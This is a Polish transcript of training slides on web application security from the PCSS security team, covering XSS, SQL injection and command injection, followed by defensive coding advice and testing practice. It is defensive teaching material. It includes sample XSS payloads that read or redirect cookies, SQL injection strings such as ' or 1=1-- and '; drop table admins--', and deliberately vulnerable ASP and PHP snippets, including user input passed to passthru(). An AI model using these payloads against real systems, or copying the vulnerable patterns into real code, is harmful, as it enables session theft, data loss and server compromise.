Bezpieczeństwo aplikacji webowych

Wielkość: px
Rozpocząć pokaz od strony:

Download "Bezpieczeństwo aplikacji webowych"

Transkrypt

1 Bezpieczeństwo aplikacji webowych Tomasz Nowocień Zespół Bezpieczeństwa PCSS Szkolenie Działu KDM PCSS Poznań,

2 Szkolenie - plan spotkania Rozpoczęcie, powitanie, informacje organizacyjne 10:05 Wprowadzenie 10:15 Najpopularniejsze ataki na aplikacje webowe podatności kodu 10:45 Przerwa 10:50 Zasady tworzenia bezpiecznego kodu, ochrona danych unikanie podatności 11:30 Podsumowanie 2

3 Informacje organizacyjne Ankieta krótka anonimowa bardzo pomocna w organizacji przyszłych szkoleń Lista obecności nie jest anonimowa ;-) proszę zaznaczyć, jeśli NIE Ŝyczycie sobie Państwo otrzymywania informacji o kolejnych szkoleniach Prezentacja dostępna na stronach WWW: 3

4

5 Zespół Bezpieczeństwa PCSS Dedykowany zespół istnieje od 1996r. Podstawowy zakres prac Zespołu Zabezpieczanie infrastruktury PCSS Zadania bezpieczeństwa w projektach R&D Szkolenia i transfer wiedzy Badania własne Audyty i doradztwo w zakresie bezpieczeństwa IT Niektóre badania z ostatnich lat Bezpieczeństwo bankowości elektronicznej (2006) Bezpieczeństwo serwerów WWW Apache i MS IIS (2007) Bezpieczeństwo sklepów internetowych (2008) security.psnc.plpl 5

6 Szkolenia ZB PCSS Szkolenia Działu KDM Szkolenia Centrum Innowacji Microsoft Bezpieczeństwo heterogenicznej platformy hostingowej (IIS + PHP, MySQL/MS SQL) 8.06 (Warszawa), (Poznań) Omijanie firewalli w systemach Windows (warsztaty) (Poznań) MoŜliwość zgłoszenia własnego tematu szkolenia 6

7 Wstęp 7

8 Czym ta prezentacja nie jest Kursem hackingu Kursem programowania Kursem administrowania Kursem testowania 8

9 Po co to szkolenie? śeby przybliŝyć problemy pisania kodu bezpiecznego 9

10 Co oznacza bezpieczny kod? Czy ma poŝądaną funkcjonalność? Czy posiada wymagane opcje? Czy jest odporny na błędne dane? 10

11 Po co tworzyć bezpieczny kod? 9 wymówek (Writing Secure Code): 1. Nikt tego nie zrobi. 2. Dlaczego ktoś miałby to zrobić? 3. Nigdy nie zostaliśmy zaatakowani 4. Jesteśmy bezpieczni stosujemy kryptografię 5. Jesteśmy bezpieczni stosujemy listy ACL 6. Jesteśmy bezpieczni stosujemy zapory firewall 7. Dokonaliśmy rewizji kodu i nie znaleźliśmy Ŝadnych błędów w zabezpieczeniach 8. Jasne, Ŝe opcja ta jest domyślna, ale administrator moŝe ją wyłączyć 9. JeŜeli nie zostanie to uruchomione w kontekście konta administratora, to wówczas nie zadziała 11

12 Czy programista musi się przejmować? Za system odpowiada administrator System jest chroniony przez oprogramowanie (firewall, IDS/IPS) UŜytkownicy są przeszkoleni WdroŜeniowcy znają dobrą konfigurację 12

13 Programista musi się przejmować! Idea Defence in depth - chronimy dane na kaŝdym etapie: nie moŝna wierzyć administratorom nie moŝna wierzyć uŝytkownikom nie moŝna wierzyć wdroŝeniowcom 13

14 Czy moŝna bezbłędnie napisać oprogramowanie? Na kaŝde napisane 1000 linii kodu przypada błędów!! źródło: Badania Carnegie Mellon University s CyLab Sustainable Computing Consortium 14

15

16 Podatności aplikacji webowych 16

17

18 XSS XSS = Cross Site Scripting wykonywanie skryptów międzyserwisowych Przebieg ataku aplikacja webowa otrzymuje od napastnika złośliwe dane, np. w postaci odpowiednio sformatowanego linku napastnik skłania ofiarę do kliknięcia w link przeglądarka ofiary generuje stronę zawierającą złośliwe treści złośliwy kod zostaje wykonany w przeglądarce z uprawnieniami korzystającego z niej uŝytkownika 18

19 XSS przykład (1) ASP <html><body> Witaj <% response.write(" " & request.querystring("imie")) %> </body></html> PHP <html><body> Witaj <?= $_GET[ imie ]?> </body></html> 19

20 XSS przykład (2) imie=ala<script> alert(document.cookie)</script> 20

21 XSS - zagroŝenia KradzieŜ danych sesyjnych <script>document.location= a= +document.cookie</script> Nieautoryzowany dostęp do danych i operacji <script>document.location="/admin/delete.php? id=666";</script> Atak DoS na przeglądarkę <MARQUEE><TABLE><MARQUEE HEIGHT=999999> Zaawansowane ataki Skanowanie portów w sieci lokalnej 21

22 SQL Injection SQL Injection wstrzyknięcie własnej, dodatkowej treści do zapytania SQL przyczyna: brak lub nieodpowiednia filtracja danych Przebieg ataku napastnik znajduje punkt wprowadzenia danych uŝytkownika, który korzysta z bazy danych wpisuje odpowiednio sfałszowane Ŝądanie napastnik ogląda nieautoryzowane dane w swojej przeglądarce (i / lub serwer baz danych modyfikuje bazę po stronie serwera) 22

23 SQL Injection - przykład select count (*) from users where username='$_get["user ]' and passwd='$_get["pass ]' 23

24 SQL Injection - przykład ' or 1=1;-- select count (*) from users where username='' or 1=1;--' and passwd='*******' 24

25 SQL Injection - przykład set nazwisko = request.form("nazwisko") set objconn = Server.CreateObject("ADODB.Connection") objconn.open <CONNECTION_STRING> strsql = "SELECT * FROM pensje WHERE Nazwisko ='" strsql = strsql & nazwisko strsql = strsql & "'" set objrs = Server.CreateObject("ADODB.Recordset") objrs.open strsql, objconn do while not objrs.eof response.write("<br>") for each x in objrs.fields response.write(" " & x.name & " = " & x.value & " ") next objrs.movenext loop objconn.close 25

26 SQL Injection - zagroŝenia Atak na poufność (1) SELECT * from users where user= test union select * from admins-- Atak na poufność (2) SELECT count(*) from users where user= test or 1=1-- Atak na integralność danych SELECT * from users where user= test ; insert into zarobki (id, value) values (3, ) - Atak na dostępność danych SELECT * from users where user= ; drop table admins-- 26

27 Wykonanie poleceń systemowych Wykonanie dowolnego polecenia systemowego z uprawnieniami serwera www MoŜe wystąpić, gdy program wywołuje jakiekolwiek polecenie systemowe z parametrami uŝytkownika 27

28 Wykonanie poleceń systemowych - przykład PHP: <html> <?php $ip=$_get['ip'] echo "Pinging host $ip" passthru (ping -c 4 $ip);?> </html> 28

29 Wykonanie poleceń systemowych - zagroŝenia ZaleŜne od poziomu przywilejów serwera MoŜe wystąpić atak na: Dostępność Integralność Poufność 29

30 Unikanie podatności 30

31 NajwaŜniejszą przyczyną naruszeń bezpieczeństwa jest brak (lub niewystarczające) sprawdzenie danych wejściowych dostarczonych programowi 31

32 Unikanie podatności Działania techniczne Działania organizacyjne 32

33 Zapobieganie techniczne Podatności oprogramowania najlepiej wystrzegać się na etapie pisania kodu Sprawdzanie danych wejściowych od strony uŝytkownika Sprawdzanie danych wejściowych od strony systemu (!) Ograniczenie danych wejściowych 33

34 Pisanie kodu dane wejściowe (1) Tworzenie white list w kodzie HTML Miesiąc: <br>wybierz miesiąc: <select name="m"> <option value='1' selected>styczeń</option> <option value='2'>luty</option>... <option value='12'>grudzień</option> <select> 34

35 Pisanie kodu dane wejściowe (2) Ominięcie zabezpieczenia : 35

36 Pisanie kodu dane wejściowe (3) Sprawdzanie danych po stronie serwera! 36

37 Pisanie kodu dane wejściowe (4) Najbezpieczniejsze podejście White List : if ($_GET['m']==1) $miesiac='styczen'; elseif ($_GET['m']==2) $miesiac='luty';... elseif ($_GET['m']==12) $miesiac='grudzien'; else $miesiac='grudzien'; 37

38 Pisanie kodu dane wejściowe (5) UŜycie mechanizmów wbudowanych w środowisko PHP $state_tmp = addslashes($_post['state']); ASP ASP.NET 1.1: Validate Request 38

39 Ufajmy konfiguracji Umiejętne uŝycie mechanizmów wbudowanych w środowisko PHP 4, 5 if(get_magic_quotes_gpc()) { $state_tmp = $_POST['state']; } else { $state_tmp = addslashes($_post['state']); } 39

40 Nie ufajmy konfiguracji Ale co jeŝeli... magic_quotes_sybase jest włączone? if(get_magic_quotes_gpc()) { $state_tmp = $_POST['state']; } else { $state_tmp = addslashes($_post['state']); } 40

41 Obsługa błędów Komunikat błędu nie moŝe dawać zbyt wielu wskazówek napastnikowi Przykłady nieprawidłowości: zbyt wysoki poziom raportowania błędów przez serwer WWW: ujawnianie ścieŝek systemowych, wersji serwera... wyświetlanie wewnętrznych adresów IP na dostępnych publicznie stronach WWW wyświetlanie uŝytkownikowi kompletu informacji diagnostycznych po wystąpieniu wyjątku Pełna informacja powinna się znaleźć TYLKO w pliku logu! 41

42 Dane z baz danych Dane pobierane z bazy danych naleŝy równieŝ sprawdzać dane w bazie mogą być przekłamane Podobnie dane z plików np. obrazek moŝe być złośliwym plikiem wykonywalnym. 42

43 Zapobieganie organizacyjne UŜywanie jasnej i klarownej notacji zunifikowanej w ramach organizacji lub przynajmniej projektu Jasne i dokładne komentowanie kodu Ponowne wykorzystanie kodu Stworzenie w organizacji procedur testowania oprogramowania 43

44 Testowanie oprogramowania Testowanie przez osoby niezwiązane z tworzeniem Testowanie w środowisku testowym 44

45 Środowisko testowe Środowisko testowe powinno: być odseparowane od produkcyjnego działać na realnych danych być podobne pod względem konfiguracji do produkcyjnego 45

46 Błędy testowania Środowisko testowe toŝsame z produkcyjnym Pozostawienie w produkcie nieuŝywanego kodu Upublicznienie funkcji ujawniających informacje testowe 46

47 Programy testujące Przykłady: ASP. NET Security Analyser RATS Rough Auditing Tool for Security Pixy inne... 47

48 Programy testujące Nie wierzmy im do końca;-) False negatives - Pominięcie podatności istniejącej False positives - Wykrycie fikcyjnych podatności Narzędzia wykrywają większość automatycznych błędów Przegląd kodu przez niezaleŝnego programistę jest niezastąpiony! 48

49 Podsumowanie Nie wierzmy danym wejściowym Nie wierzmy administratorom, wdroŝeniowcom i uŝytkownikom Nie wierzmy danym w bazach danych i systemie Przechwytujmy wszystkie błędy Komentujmy kod WdraŜajmy procedury testowania Testujmy programy 49

50 Dziękuję za uwagę Pytania, komentarze? 50

Tworzenie bezpiecznego kodu w systemach Windows

Tworzenie bezpiecznego kodu w systemach Windows Tworzenie bezpiecznego kodu w systemach Windows Gerard Frankowski Zespół Bezpieczeństwa PCSS Centrum Innowacji Microsoft Poznań, 18.12.2007 1 Agenda 11:00 - Rozpoczęcie, powitanie uczestników, informacje

Bardziej szczegółowo

Bezpieczeństwo. hostingowej GERARD FRANKOWSKI, MARCIN JERZAK

Bezpieczeństwo. hostingowej GERARD FRANKOWSKI, MARCIN JERZAK Bezpieczeństwo heterogenicznej platformy hostingowej GERARD FRANKOWSKI, MARCIN JERZAK Zespół Bezpieczeństwa PCSS / Centrum Innowacji Microsoft Agenda Poznajmy się: PCSS i MIC Dlaczego heterogeniczny hosting?

Bardziej szczegółowo

Poznańskie Centrum Superkomputerowo-Sieciowe Operator sieci PIONIER oraz POZMAN Uczestnik projektów naukowo-badawczych Główne obszary zainteresowań:

Poznańskie Centrum Superkomputerowo-Sieciowe Operator sieci PIONIER oraz POZMAN Uczestnik projektów naukowo-badawczych Główne obszary zainteresowań: Zabezpieczanie aplikacji webowych w ASP.NET Gerard Frankowski Zespół Bezpieczeństwa PCSS Warsztaty Startup-IT Tworzenie serwisów internetowych Poznań, 26.02.2009 1 Agenda Kim jesteśmy i co robimy? PCSS

Bardziej szczegółowo

Joomla! Zabezpieczanie witryn

Joomla! Zabezpieczanie witryn Joomla! Zabezpieczanie witryn Autor: Tom Canavan T³umaczenie: Roman Gryzowski, Tomasz Walczak ISBN: 978-83-246-2197-2 Tytu³ orygina³u: Joomla! Web Security Format: 170 230, stron: 248 Zabezpiecz stronê

Bardziej szczegółowo

Bezpieczeństwo w firmie dobre praktyki korzystania z rozwiąza

Bezpieczeństwo w firmie dobre praktyki korzystania z rozwiąza Bezpieczeństwo w firmie dobre praktyki korzystania z rozwiąza zańmicrosoft Gerard Frankowski, Zespół Bezpieczeństwa PCSS 1 Poznań, 24.0.06.2008.2008 Agenda (1) 11:00 Powitanie, wprowadzenie dla uczestników,

Bardziej szczegółowo

Bezpieczeństwo aplikacji PHP hostowanych w środowisku. Windows. Gerard Frankowski, PCSS

Bezpieczeństwo aplikacji PHP hostowanych w środowisku. Windows. Gerard Frankowski, PCSS Bezpieczeństwo aplikacji PHP hostowanych w środowisku Windows Gerard Frankowski, PCSS III Konferencja MIC Nowoczesne technologie bliŝej nas Poznań,, 16.04.2009 1 Agenda Bezpieczeństwo w MIC O O czym dziś

Bardziej szczegółowo

Gerard Frankowski, Zespół Bezpieczeństwa PCSS

Gerard Frankowski, Zespół Bezpieczeństwa PCSS Bezpieczeństwo SQL Server 2008 Gerard Frankowski, Zespół Bezpieczeństwa PCSS Spotkanie społeczności PLSSUG i PG.NET 19.11.2009 Agenda Poznajmy się: czym jest PCSS imic? Wprowadzenie bezpieczeństwo wieloaspektowe

Bardziej szczegółowo

Bezpieczeństwo serwera Microsoft IIS v. 7.0

Bezpieczeństwo serwera Microsoft IIS v. 7.0 Bezpieczeństwo serwera Microsoft IIS v. 7.0 BłaŜej Miga, Gerard Frankowski Zespół Bezpieczeństwa PCSS Centrum Innowacji Microsoft Poznań, 30.10.2007 1 Agenda 11:00 - Rozpoczęcie, powitanie uczestników,

Bardziej szczegółowo

Tomasz Nowocień, Zespół. Bezpieczeństwa PCSS

Tomasz Nowocień, Zespół. Bezpieczeństwa PCSS Bezpieczeństwo IT Tomasz Nowocień, Zespół Bezpieczeństwa PCSS 1 Poznań, 24.10.2008 2008 Agenda Kim jesteśmy? Bezpieczeństwo danych. Zagrożenia i sposoby zabezpieczeń Zabezpieczenie platformy Windows Serwer

Bardziej szczegółowo

Omijanie firewalli w systemach Windows ---warsztaty --- Mateusz Drygas, Marcin Jerzak, Jakub Tomaszewski, Zespół Bezpieczeństwa PCSS Poznań, 18.06 06.2009 1 Agenda 10:00 Rozpoczęcie, powitanie uczestników,

Bardziej szczegółowo

Systemy IDS/IPS dla aplikacji webowych

Systemy IDS/IPS dla aplikacji webowych Dokument pobrany z serwisu: www.centrum.bezpieczenstwa.pl Autor artykułu: Michał Melewski Systemy IDS/IPS dla aplikacji webowych Stan bezpieczeństwa w Internecie Zawsze kiedy mam opisać stan bezpieczeństwa

Bardziej szczegółowo

Instalator systemu mmedica

Instalator systemu mmedica Instalator systemu mmedica Dokumentacja uŝytkownika wersja 1.1.5.2 data 2007-08-24 Spis treści 1. Przygotowanie do instalacji 3 1.1. Wymagania instalatora 3 1.2. Wymagane elementy i moŝliwości instalacji

Bardziej szczegółowo

Wykorzystanie OpenSSL w programowaniu bezpiecznych aplikacji

Wykorzystanie OpenSSL w programowaniu bezpiecznych aplikacji Wykorzystanie OpenSSL w programowaniu bezpiecznych aplikacji Szkolenie działu KDM PCSS, Poznań, 28.02.2006r. Gerard Frankowski Zespół Bezpieczeństwa PCSS 1 Niniejsza prezentacja ma na celu zaprezentowanie

Bardziej szczegółowo

PRZEWODNIK PODSTAWOWYCH

PRZEWODNIK PODSTAWOWYCH PRZEWODNIK PODSTAWOWYCH ELEMENTÓW BEZPIECZEŃSTWA KOMPUTERÓW PRACUJĄCYCH POD KONTROLĄ SYSTEMU MICROSOFT WINDOWS 7 SP1 Wersja 1.0 OPRACOWANIE POWSTAŁO W RAMACH SECURITY COOPERATION PROGRAM (SCP) Spis treści

Bardziej szczegółowo

Automatyczne skanery podatności aplikacji internetowych

Automatyczne skanery podatności aplikacji internetowych BIULETYN INSTYTUTU AUTOMATYKI I ROBOTYKI NR 32, 2012 Automatyczne skanery podatności aplikacji internetowych Paulina TURLEWICZ Instytut Teleinformatyki i Automatyki WAT ul. Gen. S. Kaliskiego 2, 00-908

Bardziej szczegółowo

Narzędzia. Początki. Atak. hakin9

Narzędzia. Początki. Atak. hakin9 hakin9 Witam! Terminy haker, cracker kojarzą się zwykłym ludziom raczej z pojęciem cyberprzestępcy, jednak bardziej wtajemniczeni wiedzą, że te dwa typy różnią się od siebie. Jak zapewne Państwo wiedzą,

Bardziej szczegółowo

Aspekty bezpieczeństwa IT w systemach komputerowych

Aspekty bezpieczeństwa IT w systemach komputerowych Aspekty bezpieczeństwa IT w systemach komputerowych Łukasz Czarniecki, Marcin Jerzak Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa Poznań, 16.12.2009 1 Agenda 11:00 12:30 Bezpieczeństwo

Bardziej szczegółowo

IIS Bezpieczny hosting

IIS Bezpieczny hosting IIS Bezpieczny hosting BłaŜej Miga Gerard Frankowski Zespół Bezpieczeństwa PCSS IT Underground Warszawa, 7-9.11.2007 1 Agenda Kim jesteśmy PCSS + Zespół Bezpieczeństwa Przedstawienie Microsoft IIS Historia

Bardziej szczegółowo

PRACA DYPLOMOWA STACJONARNE STUDIA I

PRACA DYPLOMOWA STACJONARNE STUDIA I WOJSKOWA AKADEMIA TECHNICZNA im. Jarosława Dąbrowskiego WYDZIAŁ CYBERNETYKI PRACA DYPLOMOWA STACJONARNE STUDIA I Temat: SYSTEM REJESTRACJI UŻYTKOWNIKÓW W SERWISIE INTERNETOWYM Autor: Piotr KWIATEK Kierownik

Bardziej szczegółowo

LABORATORIUM Z ROZPROSZONYCH I OBIEKTOWYCH SYSTEMÓW BAZ DANYCH

LABORATORIUM Z ROZPROSZONYCH I OBIEKTOWYCH SYSTEMÓW BAZ DANYCH POLITECHNIKA WROCŁAWSKA WYDZIAŁ ELEKTRONIKI LABORATORIUM Z ROZPROSZONYCH I OBIEKTOWYCH SYSTEMÓW BAZ DANYCH System obsługi internetowego rozkładu jazdy oparty o rozproszoną bazę danych AUTORZY: Michał Kowalczyk

Bardziej szczegółowo

Dawid Kaleta. Internetowy system rezerwacji biletów. Praca dyplomowa

Dawid Kaleta. Internetowy system rezerwacji biletów. Praca dyplomowa WYśSZA SZKOŁA KOMUNIKACJI I ZARZĄDZANIA W POZNANIU Dawid Kaleta Internetowy system rezerwacji biletów Praca dyplomowa Promotor: dr. inŝ. Jarosław Warczyński Instytut: Wydział technologii informacyjnych

Bardziej szczegółowo

ZagroŜenia usługi DNS

ZagroŜenia usługi DNS BIULETYN INSTYTUTU AUTOMATYKI I ROBOTYKI NR 25, 2008 ZagroŜenia usługi DNS Marek BORZYM, Zbigniew SUSKI Instytut Teleinformatyki i Automatyki WAT ul. Gen. S. Kaliskiego 2, 00-908 Warszawa, WyŜsza Szkoła

Bardziej szczegółowo

protokołu IPSec. Gerard Frankowski Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa

protokołu IPSec. Gerard Frankowski Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa Zabezpieczanie komunikacji sieciowej przy pomocy protokołu IPSec. Gerard Frankowski Poznańskie Centrum Superkomputerowo Sieciowe Zespół Bezpieczeństwa Poznań, 30.01.2007 1 Witam Państwa serdecznie na szkoleniu

Bardziej szczegółowo

4. Bezpieczeństwo systemu operacyjnego i aplikacji

4. Bezpieczeństwo systemu operacyjnego i aplikacji Wykl 4. 4. Bezpieczeństwo systemu operacyjnego i aplikacji Bezpieczeństwo systemu operacyjnego jest ważnym elementem bezpieczeństwa sieciowego w organizacji. Stacja robocza w strategii ochrony dogłębnej

Bardziej szczegółowo

Załącznik nr 3 do SIWZ SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA

Załącznik nr 3 do SIWZ SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA Załącznik nr 3 do SIWZ SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA 1. SŁOWNIK SKRÓTÓW I POJĘĆ... 5 2. CEL WDROŻENIA SYSTEMU LSI 2014-20... 6 3. WYMAGANIA SYSTEMU... 6 3.1 ZGODNOŚĆ Z OBOWIĄZUJĄCYMI PRZEPISAMI

Bardziej szczegółowo

Raport o stanie bezpieczeństwa cyberprzestrzeni RP w 2011 roku

Raport o stanie bezpieczeństwa cyberprzestrzeni RP w 2011 roku Raport o stanie bezpieczeństwa cyberprzestrzeni RP w 2011 roku Warszawa 2012 CERT.GOV.PL CERT.GOV.PL Rządowy Zespół Reagowania na Incydenty Komputerowe CERT.GOV.PL został powołany w dniu 1 lutego 2008

Bardziej szczegółowo

Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych.

Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych. Bezpieczne strony WWW dla edukacji, organizacji non-profit i uŝytkowników indywidualnych. Jerzy Mikołajczak, Sebastian Petruczynik, Marek Zawadzki support-mic@man.poznan.pl 1 Plan prezentacji: 1. Wstęp

Bardziej szczegółowo

Standardy oceny bezpieczeństwa i strategie ochrony aplikacji Web

Standardy oceny bezpieczeństwa i strategie ochrony aplikacji Web Standardy oceny bezpieczeństwa i strategie ochrony aplikacji Web Aplikacje Web tworzone są przez deweloperów na zamówienie firm, w celu spełnienia ich specyficznych potrzeb. Firma zatrudniając dewelopera

Bardziej szczegółowo

Kontakt. System Antywirusowy NOD32

Kontakt. System Antywirusowy NOD32 Kontakt Producent: Dystrybutor w Polsce: Eset Software DAGMA Sp. z o.o. 1172 Orange Ave ul. Pszczyńska 15 Coronado 40 478 Katowice, Polska California, 92118 Tel: +48 32 259 11 00 USA Fax: +48 32 259 11

Bardziej szczegółowo

ATAK. Kierownik produkcji: Andrzej Kuca andrzej.kuca@software.com.pl

ATAK. Kierownik produkcji: Andrzej Kuca andrzej.kuca@software.com.pl 1/2011 (68) DRODZY CZYTELNICY Wraz z noworocznymi życzeniami trafia do Was najnowszy numer Hakin9. Mamy nadzieję, że każdy z Was znajdzie w nim coś interesującego dla siebie. Zaglądając do środka będziecie

Bardziej szczegółowo